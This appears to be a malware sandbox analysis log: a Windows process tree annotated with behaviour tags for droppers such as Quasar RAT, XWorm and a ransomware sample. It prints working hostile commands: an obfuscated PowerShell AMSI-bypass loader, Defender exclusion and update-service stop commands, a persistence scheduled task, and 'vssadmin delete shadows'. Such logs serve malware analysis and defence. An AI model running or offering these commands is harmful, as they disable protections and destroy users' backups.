C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:EtobRvRFAqEJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ZPXWSzefjYksjZ,[Parameter(Position=1)][Type]$CEDsnxyPjb)$FjTxcqBBkrc=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'fl'+'e'+''+[Char](99)+'tedDe'+[Char](108)+''+[Char](101)+'ga'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+'e'+''+[Char](109)+''+[Char](111)+''+'r'+''+'y'+'M'+[Char](111)+''+[Char](100)+''+'u'+''+'l'+''+'e'+'',$False).DefineType('MyD'+'e'+'l'+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+''+[Char](84)+'y'+[Char](112)+''+[Char](101)+'',''+'C'+''+'l'+'a'+[Char](115)+''+[Char](115)+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+'Se'+[Char](97)+''+'l'+''+[Char](101)+''+[Char](100)+','+[Char](65)+''+'n'+'s'+'i'+''+[Char](67)+'l'+'a'+'s'+'s'+''+','+''+'A'+''+[Char](117)+'t'+[Char](111)+'C'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$FjTxcqBBkrc.DefineConstructor('R'+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+'ci'+[Char](97)+''+'l'+''+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+''+[Char](105)+'d'+'e'+'B'+[Char](121)+''+'S'+'i'+[Char](103)+''+[Char](44)+''+'P'+'u'+'b'+'l'+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$ZPXWSzefjYksjZ).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+','+''+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');$FjTxcqBBkrc.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+'o'+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+','+[Char](78)+''+[Char](101)+'w'+'S'+''+[Char](108)+''+[Char](111)+''+'t'+''+','+''+'V'+''+[Char](105)+''+'r'+''+'t'+''+'u'+''+[Char](97)+''+'l'+'',$CEDsnxyPjb,$ZPXWSzefjYksjZ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+[Char](77)+''+'a'+''+[Char](110)+''+'a'+'ged');Write-Output $FjTxcqBBkrc.CreateType();}$OXBHswAJQNkGv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'s'+[Char](116)+''+[Char](101)+'m.'+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+'cr'+[Char](111)+''+[Char](115)+''+'o'+'f'+[Char](116)+''+'.'+''+'W'+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+'n'+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+'e'+'M'+''+[Char](101)+''+[Char](116)+''+'h'+'o'+[Char](100)+''+[Char](115)+'');$degCgTBAJLUCdp=$OXBHswAJQNkGv.GetMethod('G'+[Char](101)+'t'+'P'+''+[Char](114)+''+[Char](111)+'c'+'A'+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('Publ'+[Char](105)+''+[Char](99)+''+','+''+'S'+'t'+'a'+'t'+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RKPyxxvOAmUVQuUgSND=EtobRvRFAqEJ @([String])([IntPtr]);$SLcIXwSvwqZaecSSBbiRFe=EtobRvRFAqEJ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$AkljJISCMvd=$OXBHswAJQNkGv.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+'a'+''+'n'+''+'d'+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('ke'+'r'+''+[Char](110)+'e'+[Char](108)+''+[Char](51)+''+[Char](50)+'.'+'d'+''+'l'+''+[Char](108)+'')));$nOAGDEzRfIEjTi=$degCgTBAJLUCdp.Invoke($Null,@([Object]$AkljJISCMvd,[Object]('L'+[Char](111)+''+[Char](97)+''+'d'+''+[Char](76)+''+[Char](105)+''+'b'+'ra'+[Char](114)+''+[Char](121)+'A')));$SokUybRAQgbIHZXGQ=$degCgTBAJLUCdp.Invoke($Null,@([Object]$AkljJISCMvd,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+'t'+'u'+[Char](97)+''+'l'+''+'P'+''+[Char](114)+''+'o'+''+[Char](116)+'e'+'c'+'t')));$cHipTKa=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nOAGDEzRfIEjTi,$RKPyxxvOAmUVQuUgSND).Invoke('am'+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+''+[Char](108)+'l');$imqkPZWScXVHfLXVg=$degCgTBAJLUCdp.Invoke($Null,@([Object]$cHipTKa,[Object](''+[Char](65)+''+'m'+''+'s'+'i'+[Char](83)+''+[Char](99)+''+'a'+'n'+[Char](66)+''+[Char](117)+''+'f'+''+'f'+''+'e'+'r')));$VPgasVWKyu=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SokUybRAQgbIHZXGQ,$SLcIXwSvwqZaecSSBbiRFe).Invoke($imqkPZWScXVHfLXVg,[uint32]8,4,[ref]$VPgasVWKyu);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$imqkPZWScXVHfLXVg,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SokUybRAQgbIHZXGQ,$SLcIXwSvwqZaecSSBbiRFe).Invoke($imqkPZWScXVHfLXVg,[uint32]8,0x20,[ref]$VPgasVWKyu);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+'T'+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+''+[Char](105)+'a'+'l'+''+'e'+''+'r'+'st'+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
PID:41088
-
-
C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exeC:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe2⤵PID:11104
-
-
C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exeC:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe2⤵PID:13036
-
-
C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exeC:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe2⤵PID:22232
-
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:32868
-
-
C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exeC:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe2⤵PID:37064
-
-
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe2⤵PID:37864
-
-
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe2⤵PID:19148
-
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe2⤵PID:19108
-
-
C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exeC:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe2⤵PID:17336
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\TERRAR~1.EXE"3⤵PID:6660
-
C:\Users\Admin\AppData\Local\Temp\3582-490\TERRAR~1.EXEC:\Users\Admin\AppData\Local\Temp\3582-490\TERRAR~1.EXE4⤵PID:12980
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe2⤵PID:31008
-
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe2⤵PID:33796
-
-
C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exeC:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe2⤵PID:19988
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\TERRAR~1.EXE"3⤵PID:19852
-
C:\Users\Admin\AppData\Local\Temp\3582-490\TERRAR~1.EXEC:\Users\Admin\AppData\Local\Temp\3582-490\TERRAR~1.EXE4⤵PID:20020
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\service123.exeC:\Users\Admin\AppData\Local\Temp\/service123.exe2⤵PID:25312
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1192
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1276
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1312
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1368
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1420
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2676
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1456
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1464
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1476
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1648
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1696
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1744
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1784
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1824
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1956
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1988
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1704
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:1728
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2052
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2124
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2220
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2236
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2532
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2540
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2700
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2776
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2832
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2844
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2860
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2872
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2944
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3092
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3456
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:3556 -
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"2⤵
- Quasar RAT
- Checks computer location settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2760
-
-
C:\Users\Admin\AppData\Local\Temp\Files\OfferedBuilt.exe"C:\Users\Admin\AppData\Local\Temp\Files\OfferedBuilt.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4880 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Dominant Dominant.cmd & Dominant.cmd4⤵
- Suspicious use of WriteProcessMemory
PID:3428 -
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1536
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"5⤵
- System Location Discovery: System Language Discovery
PID:1680
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4268
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"5⤵
- System Location Discovery: System Language Discovery
PID:3024
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 735485⤵
- System Location Discovery: System Language Discovery
PID:3040
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "EvilTeethMagnificentSub" Shoulder5⤵
- System Location Discovery: System Language Discovery
PID:4980
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b Appreciated + Consequences + Atmospheric + Under + Medium + Edt + Launched + Expert + Ready + Korean + Cite + Suspended + Set + Maple 73548\h5⤵PID:3964
-
-
C:\Users\Admin\AppData\Local\Temp\73548\Mph.pif73548\Mph.pif 73548\h5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1012 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "GaiaTrack" /tr "wscript //B 'C:\Users\Admin\AppData\Local\EcoOptimize Solutions\GaiaTrack.js'" /sc onlogon /F /RL HIGHEST6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2600
-
-
C:\Users\Admin\AppData\Local\Temp\73548\Mph.pifC:\Users\Admin\AppData\Local\Temp\73548\Mph.pif6⤵
- Executes dropped EXE
PID:1972
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 155⤵
- Delays execution with timeout.exe
PID:1532
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\3546345.exe"C:\Users\Admin\AppData\Local\Temp\Files\3546345.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:2808
-
-
C:\Users\Admin\AppData\Local\Temp\Files\1.exe"C:\Users\Admin\AppData\Local\Temp\Files\1.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1752 -
C:\Windows\sysklnorbcv.exeC:\Windows\sysklnorbcv.exe4⤵
- Modifies security service
- Windows security bypass
- Checks computer location settings
- Executes dropped EXE
- Windows security modification
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1404 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"5⤵
- Suspicious use of WriteProcessMemory
PID:4612 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3788
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS5⤵
- Suspicious use of WriteProcessMemory
PID:4848 -
C:\Windows\SysWOW64\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
PID:4248
-
-
C:\Windows\SysWOW64\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
PID:4628
-
-
C:\Windows\SysWOW64\sc.exesc stop wuauserv6⤵
- Launches sc.exe
PID:2992
-
-
C:\Windows\SysWOW64\sc.exesc stop DoSvc6⤵
- Launches sc.exe
PID:3760
-
-
C:\Windows\SysWOW64\sc.exesc stop BITS6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4800
-
-
-
C:\Users\Admin\AppData\Local\Temp\937727480.exeC:\Users\Admin\AppData\Local\Temp\937727480.exe5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:652 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵PID:4916
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:2196
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵PID:3100
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:1248
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2673718949.exeC:\Users\Admin\AppData\Local\Temp\2673718949.exe5⤵
- Executes dropped EXE
PID:1680
-
-
C:\Users\Admin\AppData\Local\Temp\2774828533.exeC:\Users\Admin\AppData\Local\Temp\2774828533.exe5⤵
- Executes dropped EXE
PID:38760 -
C:\Users\Admin\AppData\Local\Temp\2605629901.exeC:\Users\Admin\AppData\Local\Temp\2605629901.exe6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:40216
-
-
-
C:\Users\Admin\AppData\Local\Temp\1049131053.exeC:\Users\Admin\AppData\Local\Temp\1049131053.exe5⤵
- Executes dropped EXE
PID:39800
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\exclude.exe"C:\Users\Admin\AppData\Local\Temp\Files\exclude.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
PID:3792 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath C:\Users"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2904
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\legas.exe"C:\Users\Admin\AppData\Local\Temp\Files\legas.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1760 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:3240
-
C:\Users\Admin\AppData\Roaming\xSzEYbwSa1.exe"C:\Users\Admin\AppData\Roaming\xSzEYbwSa1.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4276
-
-
C:\Users\Admin\AppData\Roaming\87Zvwj4Zse.exe"C:\Users\Admin\AppData\Roaming\87Zvwj4Zse.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1380
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 2524⤵
- Program crash
PID:2412
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\def.exe"C:\Users\Admin\AppData\Local\Temp\Files\def.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1188
-
-
C:\Users\Admin\AppData\Local\Temp\Files\CoronaVirus.exe"C:\Users\Admin\AppData\Local\Temp\Files\CoronaVirus.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in Program Files directory
PID:4468 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"4⤵PID:5236
-
C:\Windows\system32\mode.commode con cp select=12515⤵PID:24000
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet5⤵
- Interacts with shadow copies
PID:5160
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"4⤵PID:39812
-
C:\Windows\system32\mode.commode con cp select=12515⤵PID:16444
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet5⤵
- Interacts with shadow copies
PID:3656
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"4⤵PID:16684
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"4⤵PID:16540
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\a.exe"C:\Users\Admin\AppData\Local\Temp\Files\a.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
PID:1668 -
C:\Windows\sysvplervcs.exeC:\Windows\sysvplervcs.exe4⤵
- Modifies security service
- Windows security bypass
- Checks computer location settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: SetClipboardViewer
PID:3728 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"5⤵PID:4352
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3468
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait5⤵PID:1740
-
C:\Windows\SysWOW64\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
PID:1304
-
-
C:\Windows\SysWOW64\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
PID:4060
-
-
C:\Windows\SysWOW64\sc.exesc stop wuauserv6⤵
- Launches sc.exe
PID:60
-
-
C:\Windows\SysWOW64\sc.exesc stop DoSvc6⤵
- Launches sc.exe
PID:2420
-
-
C:\Windows\SysWOW64\sc.exesc stop BITS /wait6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4376
-
-
-
C:\Users\Admin\AppData\Local\Temp\1279416929.exeC:\Users\Admin\AppData\Local\Temp\1279416929.exe5⤵
- Checks computer location settings
- Executes dropped EXE
PID:12112 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵PID:12208
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:11528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵PID:12308
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:11628
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\301548398.exeC:\Users\Admin\AppData\Local\Temp\301548398.exe5⤵
- Executes dropped EXE
PID:10908
-
-
C:\Users\Admin\AppData\Local\Temp\935133350.exeC:\Users\Admin\AppData\Local\Temp\935133350.exe5⤵
- Executes dropped EXE
PID:512
-
-
C:\Users\Admin\AppData\Local\Temp\1044224715.exeC:\Users\Admin\AppData\Local\Temp\1044224715.exe5⤵
- Executes dropped EXE
PID:24320
-
-
C:\Users\Admin\AppData\Local\Temp\832027307.exeC:\Users\Admin\AppData\Local\Temp\832027307.exe5⤵
- Drops file in Windows directory
PID:32268 -
C:\Windows\sysnldcvmr.exeC:\Windows\sysnldcvmr.exe6⤵PID:32180
-
C:\Users\Admin\AppData\Local\Temp\228833585.exeC:\Users\Admin\AppData\Local\Temp\228833585.exe7⤵
- Checks computer location settings
PID:16928 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f8⤵PID:36820
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f9⤵PID:37020
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"8⤵PID:36788
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"9⤵PID:37028
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1914621789.exeC:\Users\Admin\AppData\Local\Temp\1914621789.exe7⤵PID:37188
-
-
C:\Users\Admin\AppData\Local\Temp\2247410655.exeC:\Users\Admin\AppData\Local\Temp\2247410655.exe7⤵PID:37364
-
-
C:\Users\Admin\AppData\Local\Temp\104331525.exeC:\Users\Admin\AppData\Local\Temp\104331525.exe7⤵
- System Location Discovery: System Language Discovery
PID:37700
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\t1.exe"C:\Users\Admin\AppData\Local\Temp\Files\t1.exe"3⤵
- Executes dropped EXE
PID:1008
-
-
C:\Users\Admin\AppData\Local\Temp\Files\xworm.exe"C:\Users\Admin\AppData\Local\Temp\Files\xworm.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:744 -
